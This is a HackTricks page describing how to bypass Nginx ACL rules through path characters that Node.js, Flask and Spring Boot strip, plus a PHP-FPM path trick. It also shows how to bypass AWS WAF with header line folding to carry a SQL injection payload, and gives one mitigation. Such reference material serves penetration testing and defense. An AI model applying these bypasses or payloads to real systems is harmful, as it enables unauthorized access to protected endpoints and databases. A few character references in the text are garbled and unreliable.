HackTricks
HackTricks
Ask or search…
⌃K
Links
Comment on page

Proxy / WAF Protections Bypass

Bypassing Nginx ACL Rules

Nginx restriction example:
location = /admin {
deny all;
}
​
location = /admin/ {
deny all;
}

NodeJS

  • As Nginx includes the character \xa0 as part of the pathname, the ACL rule for the /admin URI will not be triggered. Consequently, Nginx will forward the HTTP message to the backend;
  • When the URI /admin\x0a is received by the Node.js server, the character \xa0 will be removed, allowing successful retrieval of the /admin endpoint.
Nginx Version
Node.js Bypass Characters
1.22.0
\xA0
1.21.6
\xA0
1.20.2
\xA0, \x09, \x0C
1.18.0
\xA0, \x09, \x0C
1.16.1
\xA0, \x09, \x0C

Flask

Flask removes the characters \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B, and \x09 from the URL path, but NGINX doesn't.
Nginx Version
Flask Bypass Characters
1.22.0
\x85, \xA0
1.21.6
\x85, \xA0
1.20.2
\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.18.0
\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.16.1
\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B

Spring Boot

Below, you will find a demonstration of how ACL protection can be circumvented by adding the character \x09 or at the end of the pathname:
Nginx Version
Spring Boot Bypass Characters
1.22.0
;
1.21.6
;
1.20.2
\x09, ;
1.18.0
\x09, ;
1.16.1
\x09, ;

PHP-FPM

Let's consider the following Nginx FPM configuration:
location = /admin.php {
deny all;
}
​
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
It's possible to bypass it accessing /admin.php/index.php:

How to prevent

To prevent these issues, you must use the ~ expression Instead of the = expression on Nginx ACL rules, for example:
COPYCOPY
location ~* ^/admin {
deny all;
}

Bypassing AWS WAF ACL With Line Folding

It's possible to bypass AWS WAF protection in a HTTP header by using the following syntax where the AWS WAF won't understand X-Query header contains a sql injection payload while the node server behind will:
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

References